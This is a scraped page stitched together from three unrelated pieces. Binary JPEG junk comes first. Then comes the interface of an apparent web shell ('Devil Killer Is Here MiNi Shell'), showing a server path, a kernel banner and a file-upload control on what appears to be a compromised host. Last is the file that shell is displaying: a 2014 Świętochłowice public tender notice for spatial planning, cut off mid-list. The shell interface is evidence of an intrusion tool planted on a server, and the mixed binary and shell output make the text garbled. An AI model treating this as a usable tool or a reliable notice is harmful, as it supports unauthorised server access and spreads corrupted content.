JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140422/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140422/87403-N-2014.html

<p class="kh_header"><b>Świętochłowice: Opracowanie analizy przestrzennej miasta Świętochłowice</b><br>
<b>Numer ogłoszenia: 87403 - 2014; data zamieszczenia: 22.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świętochłowice reprezentowana przez Prezydenta Miasta Świętochłowice , ul. Katowicka 54, 41-600 Świętochłowice, woj. śląskie, tel. 32 3491 800, faks 32 349 18 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swietochlowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie analizy przestrzennej miasta Świętochłowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający występuje jako jeden z Partnerów projektu pn. Zintegrowane podejście do problemów obszarów funkcjonalnych na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic, współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013 i budżetów miast Chorzowa, Rudy Śląskiej i Świętochłowic - Partnerów projektu. 
Wspólne działania trzech jednostek samorządowych na obszarze funkcjonalnym, wykraczającym poza granice administracyjne miast, mają:
- umożliwić identyfikację obszarów wsparcia i potencjału rozwojowego miast,
-  zwiększyć atrakcyjność i konkurencyjność obszaru,
- przynieść społeczności lokalnej korzyści w zakresie planowania przestrzennego, 
- umożliwić systemowe rozwiązywanie problemów. 
Współpraca miast przy realizacji projektu pozwoli również na lepsze przygotowanie się do przyszłego okresu programowania unijnego, poprzez stworzenie podstaw merytorycznych i organizacyjnych do pozyskiwania środków zewnętrznych adresowanych do obszarów funkcjonalnych. 
Przedmiotem zamówienia jest opracowanie analizy przestrzennej miasta Świętochłowice. 
W ramach przedmiotu zamówienia należy wykonać następujące dokumenty i opracowania :
1.Analizę zmian w zagospodarowaniu przestrzennym Miasta zawierającą ocenę aktualności studium, obowiązujących planów, ocenę realizacji wniosków do planu i studium, ocenę wydanych decyzji lokalizacyjnych w kontekście polityki Miasta zawartej w studium oraz propozycje kierunkowych działań przestrzennych dla Miasta Świętochłowice,
2.Opracowanie ekofizjograficzne (podstawowe) dla obszaru Miasta objętego planami, o których mowa w pkt  3-7.
3.Miejscowy plan zagospodarowania przestrzennego dla obszaru dzielnicy Lipiny na terenie Miasta Świętochłowice w rejonie ulic Chorzowskiej, Barlickiego i Świdra  o powierzchni 26ha wykonany w rozszerzeniach dxf lub shape oraz dwg i zip.
4.Miejscowy plan zagospodarowania przestrzennego na terenie miasta Świętochłowice w rejonie ulic Chorzowskiej, Bytomskiej oraz projektowanej drogi północ-południe   o powierzchni 172,5ha wykonany w rozszerzeniach dxf lub shape oraz dwg i zip.
5.Miejscowy plan zagospodarowania przestrzennego dla obszaru dzielnicy Zgoda na terenie miasta Świętochłowice w rejonie ulic Komandra, Bukowej, Brzozowej, Granicznej  o powierzchni 30ha wykonany w rozszerzeniach dxf lub shape oraz dwg i zip.
6.Miejscowy plan zagospodarowania przestrzennego na terenie miasta Świętochłowice w obszarze pomiędzy ulicą Bytomską a granicą administracyjną miasta  o powierzchni 36ha wykonany w rozszerzeniach dxf lub shape oraz dwg i zip.
7.Miejscowy plan zagospodarowania przestrzennego dla obszaru na terenie Miasta Świętochłowice w rejonie ulic Chorzowskiej, Bytomskiej, Krasickiego  o powierzchni 60ha wykonany w rozszerzeniach dxf lub shape oraz dwg i zip.
Zakres przedmiotu umowy obejmuje również wykonanie czynności związanych z  publikacją uchwał w sprawie przedmiotowych planów w Dzienniku Urzędowym Województwa Śląskiego.
Przedmiot zamówienia należy wykonać zgodnie z aktualnie obowiązującymi przepisami prawa zawartymi w poniżej wymienionych aktach prawnych:
1.ustawa z dnia 8 marca 1990 r. o samorządzie gminnym (tekst jedn. Dz. U. z 2013r., poz.594 z późn. zm.),
2.ustawa z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym  (tekst jedn. Dz. U. z 2012 r. poz. 647 z późn. zm.);
3.rozporządzenie Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. nr 164 poz. 1587);
4.ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2013 r. poz. 1409 z późn. zm.);
5.rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie  (Dz. U. nr 75 poz. 690);
6.ustawy z dnia 21 marca 1985 r. o drogach publicznych (tekst jedn. Dz. U. z 2013 r., poz. 260 z późn. zm.);
7.rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. nr 43, poz. 430);
8.ustawa z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jedn. Dz. U. z 2013 r. poz. 687);
9.ustawa z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (tekst jedn. Dz. U. z 2013 r. poz. 267);
10.ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska  (tekst jedn. Dz. U. z 2013 r. poz. 1232 z późn. zm.);
11.ustawa z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. nr 199 poz. 1227 z późn. zm.);
12.ustawa z dnia 16 kwietnia 2004 r. o ochronie przyrody (tekst jedn. Dz. U. z 2013 r. poz. 627 z późn. zm.);
13.ustawa z dnia 18 lipca 2001 r. Prawo wodne (tekst jedn. Dz. U. z 2012 r. poz. 145 z późn. zm.);
14.ustawa z dnia 7 czerwca 2001 r. o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków (tekst jedn. Dz. U. z 2006 r. nr 123 poz. 858 z późn. zm.);
15.ustawa z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami  (Dz. U. nr 162 poz. 1568 z późn. zm.);
16.ustawa z dnia 7 maja 2010 r. o wspieraniu rozwoju usług i sieci telekomunikacyjnych (Dz. U. nr 106 poz. 675 z późn. zm.);
17.ustawa z dnia 21 sierpnia 1997 r. o gospodarce nieruchomościami (tekst jedn. z Dz. U. z 2010 r. nr 102 poz. 651 z późn. zm.);
18.Konstytucja Rzeczypospolitej Polskiej z dnia 2 kwietnia 1997 r. (Dz. U. nr 78 poz. 483 z późn. zm.);
19.ustawa z dnia 9 czerwca 2011 r. Prawo geologiczne i górnicze  (Dz. U. nr 163 poz. 981 z późn. zm.);
20.ustawa z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jedn. Dz. U. z 2010 r. nr 193 poz. 1287 z późn. zm.);
21.ustawa z dnia 3 lutego 1995 r. o ochronie gruntów rolnych i leśnych (tekst jedn. Dz. U. z 2013 r. poz. 1205);
22.rozporządzenie Ministra Środowiska z dnia 9 września 2002 r. w sprawie opracowań ekofizjograficznych  (Dz. U. nr 155 poz. 1298);
23.rozporządzenie Ministra Gospodarki Komunalnej z dnia 25 sierpnia 1959 r. w sprawie określenia, jakie tereny pod względem sanitarnym są odpowiednie na cmentarze (Dz. U. nr 52 poz. 315);
24.ustawa z dnia 13 grudnia  2013 r. o rodzinnych ogrodach działkowych ( Dz. U. 2014r.  poz. 40 );
25.rozporządzenie Ministra Środowiska z dnia 22 września 2010 r. w sprawie wzoru oraz zawartości i układu publicznie dostępnego wykazu danych o dokumentach zawierających informacje o środowisku i jego ochronie (Dz. U. nr 186 poz. 1249);
26.rozporządzenie Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. nr 213 poz. 1397 z późn. zm.);
27.rozporządzenie Ministra Środowiska z dnia 24 sierpnia 2012 r. w sprawie poziomów niektórych substancji w powietrzu (Dz. U. z 2012 r. poz. 1031); 
28.rozporządzenie Ministra Środowiska z dnia 26 stycznia 2010 r.  w sprawie wartości odniesienia dla niektórych substancji w powietrzu (Dz. U. nr 16 poz. 87); 
29.rozporządzenie Ministra Środowiska z dnia 14 czerwca 2007 r. w sprawie dopuszczalnych poziomów hałasu w środowisku (Dz. U. nr 120 poz. 826 z późn. zm.);
30.ustawa z dnia 21 sierpnia 1997 r. o ochronie zwierząt. (tekst jedn. Dz. U. z 2013 r. poz. 856 z póz. zm.).
Zamawiający udostępni nieodpłatnie Wykonawcy po podpisaniu umowy następujące materiały:
1.Uchwały Rady Miejskiej w Świętochłowicach w sprawie przystąpienia do sporządzenia miejscowych planów zagospodarowania przestrzennego,
2.Mapy zasadnicze z nakładką własnościową w standardzie cyfrowym,
3.Kopie wydanych w okresie ostatnich 4 lat decyzji administracyjnych w sprawach dotyczących zabudowy i zagospodarowania terenu,
4.Kopie złożonych w Urzędzie Miejskim w ciągu ostatnich 4 lat wniosków o sporządzenie bądź zmianę miejscowych planów zagospodarowania przestrzennego.
Zamawiający zobowiązuje się do przekazywania materiałów bieżących, w szczególności decyzji administracyjnych w sprawach dotyczących zabudowy i zagospodarowania terenu.
Wykonawca zobowiązany będzie do udziału we wszelkich czynnościach związanych z opracowaniem dokumentów, w tym również do udziału w posiedzeniach właściwej Komisji Rady Miejskiej, a także udziału na sesjach Rady Miejskiej, na których omawiane będą i uchwalane dokumenty objęte przedmiotem zamówienia. 
Wykonawca będzie zobowiązany przez okres 2 lat od uchwalenia miejscowych planów zagospodarowania przestrzennego do merytorycznego udziału w procedurze rozstrzygania zaskarżeń do sądu administracyjnego.
Wykonawca przekaże Zamawiającemu:
1.dokumentację w wersji elektronicznej w rozszerzeniach: dxf lub shape oraz dwg i zipx - zgodnie z przyjętymi standardami dla obowiązujących dokumentów planistycznych, na 2 dyskach optycznych DVD
2.dokumentację w wersji papierowej w ilości 4 egzemplarzy oraz po jednym egzemplarzu rysunkowej części opracowań przystosowanej do zawieszenia oraz sztywno zafoliowanej, (projekty planów powinny być wykonane w skali 1:1000)
Za wady przedmiotu zamówienia odpowiada Wykonawca, który wniesie wszystkie poprawki 
na własny koszt w terminie ustalonym przez Zamawiającego.
Wykonawca udzieli na przedmiot zamówienia gwarancji na okres 36 miesięcy licząc od dnia końcowego odbioru usługi.
Wykonawca udzieli na przedmiot zamówienia rękojmi na okres 24 miesięcy licząc od dnia końcowego odbioru usługi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania Wykonawca  zobowiązany jest do wniesienia wadium w wysokości :
4.000,00 zł (cztery tysiące złotych). 
Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert tj. do dnia 30.04.2014 r. do godz. 10:00.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
	1) pieniądzu;
	2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie
kasy jest zawsze poręczeniem pieniężnym;
	3) gwarancjach bankowych;
	4) gwarancjach ubezpieczeniowych;
	5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000  o 
utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz.
730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wykonawca sam wybiera sobie formę wniesienia wadium. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Urzędu Miejskiego w Świętochłowicach ING Bank Śląski S.A. Katowice O/Świętochłowice : 54 1050 1373 1000 0022 8149 7178  z dopiskiem :
Opracowanie analizy przestrzennej miasta Świętochłowice
Wadium musi znaleźć się na koncie Zamawiającego do dnia  30.04.2014 r.  do godz. 10:00. Wadium wniesione w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za wniesione w terminie  tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.  Kserokopię polecenia przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
Wadium w innej formie niż pieniądz należy złożyć w formie oryginału w Urzędzie Miejskim w  Świętochłowicach, ul. Katowicka 54, w kasie niski parter pok. 5, a kserokopię wniesienia wadium potwierdzoną za zgodność z oryginałem należy dołączyć do oferty.
Wadium wniesione przez jednego ze Wykonawców, którzy złożyli ofertę wspólną uważa się za wniesione prawidłowo.
Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.
W przypadku wniesienia wadium w innej formie niż pieniężna,  dokumenty wadialne ( gwarancja ) wystawione  w walutach obcych innych niż złoty polski zostaną przeliczone przez Zamawiającego dla potrzeb oceny wniesienia wadium w wymaganej wysokości, według średniego kursu złotego dla danej waluty podanej przez Narodowy Bank Polski ( Tabela A kursów średnich walut obcych )  na dzień opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.  Jeżeli w dniu publikacji ogłoszenia o zamówieniu, Narodowy Bank Polski nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń według  średniego kursu z pierwszego kolejnego dnia, w którym Narodowy Bank Polski  opublikuje  informacje.
Zamawiający dokona zwrotu  wadium wszystkim Wykonawcom uczestniczącym w przedmiotowym postępowaniu niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, za wyjątkiem tego Wykonawcy, którego oferta została wybrana jako najkorzystniejsza
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy.
Zamawiający na  pisemny wniosek wykonawcy zwróci wadium w przypadku wycofania oferty przed upływem terminu składania ofert.
Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium,  jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca zobowiązany jest do wniesienia wadium w terminie określonym przez Zamawiającego.
Zgodnie z treścią przepisu art. 46 ust. 5 ustawy Wykonawca, którego oferta została wybrana, traci wadium wraz z odsetkami na rzecz zamawiającego wyłącznie wtedy gdy:
1.odmówi podpisania umowy na warunkach określonych w ofercie,
2.wykonawca nie wniesie zabezpieczenia należytego wykonania umowy na zasadach określonych  w specyfikacji istotnych warunków zamówienia,
3.zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.   
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa w tym zakresie  szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie  oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej dwa ( 2 ) zamówienia  polegające na wykonaniu  miejscowych planów zagospodarowania przestrzennego lub zmian miejscowych planów dla obszaru miejskiego  o  powierzchni co najmniej 50 ha, o  wartości  nie mniejszej niż 100.000 zł brutto każda usługa.  Przez dwa  ( 2 ) zamówienia  Zamawiający rozumie  usługi  planowania przestrzennego  wykonane na podstawie dwóch  odrębnych umów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa w tym zakresie  szczegółowego warunku udziału w postępowaniu.
Zamawiający dokona oceny spełnienia  tego warunku udziału w postępowaniu na podstawie  oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje lub będzie dysponował osobami zdolnymi do wykonania niniejszego zamówienia tj. 

a)  główny projektant  -  urbanista  posiadający  co najmniej 5  letnie doświadczenie zawodowe w samodzielnym projektowaniu przestrzeni  oraz  doświadczenie  ( samodzielne  lub w zespole ) w wykonaniu co najmniej dwóch ( 2) planów zagospodarowania przestrzennego,  obejmujących obszary  miejskie o  powierzchni co najmniej 50 ha,  na którym  prowadzi się lub prowadziło się eksploatację podziemną i występują tereny lub obszary górnicze.
Przez  obszar górniczy Zamawiający zgodnie z treścią przepisu  art. 6 ust. 1 pkt 5 ustawy z dnia 9.06.2011r. Prawo geologiczne i górnicze ( Dz. U. nr 163, poz. 981 z póz. zm. ) rozumie  -  przestrzeń, w granicach której przedsiębiorca jest uprawniony do wydobywania kopaliny, podziemnego bezzbiornikowego magazynowania substancji, podziemnego składowania odpadów, podziemnego składowania dwutlenku węgla oraz prowadzenia robót górniczych niezbędnych do wykonywania koncesji ,  który jest wpisany do rejestru  obszarów górniczych ( terenów górniczych )  prowadzonego    na podstawie rozporządzenia Ministra Środowiska z dnia  15.12.2011r. w sprawie  rejestru obszarów górniczych  ( Dz. U. Nr 286, poz. 1685) . 
Przez realizację  planu Zamawiający rozumie opublikowanie uchwały w sprawie zatwierdzenia miejskiego planu zagospodarowania przestrzennego w Dzienniku Urzędowym Województwa.
Główny  projektant  planu  musi   posiadać aktualne zaświadczenie  o członkostwie w Okręgowej Izbie Urbanistów.

b) projektant sprawdzający - urbanista  posiadający co najmniej 5 letnie doświadczenie w samodzielnym projektowaniu przestrzeni oraz doświadczenie  ( samodzielne lub w zespole ) w  wykonaniu   co najmniej jednego  ( 1 ) planu  zagospodarowania przestrzennego,  obejmującego   obszar  miejski  o  powierzchni co najmniej 50 ha,  na którym  prowadzi się lub prowadziło się eksploatację podziemną i występują tereny lub obszary górnicze.

c)  rzeczoznawca majątkowy posiadający doświadczenie  ( samodzielne lub w zespole ) w wykonaniu  co najmniej  jednej ( 1 ) prognozy  skutków finansowych  do  miejscowych planów zagospodarowania przestrzennego obejmującej  obszary miejskie o  powierzchni co najmniej 50 ha,  

d)  specjalista w zakresie ochrony środowiska posiadający doświadczenie ( samodzielne lub w zespole ) w wykonaniu co najmniej  jednej ( 1 ) prognozy oddziaływania na środowisko do miejscowych planów  zagospodarowania przestrzennego obejmującej  obszary miejskie o  powierzchni co najmniej 50 ha.  

Zamawiający nie dopuszcza łączenia  tych samych osób na wskazane stanowiska.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia  na sumę ubezpieczenia  nie mniejszą niż 100.000 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

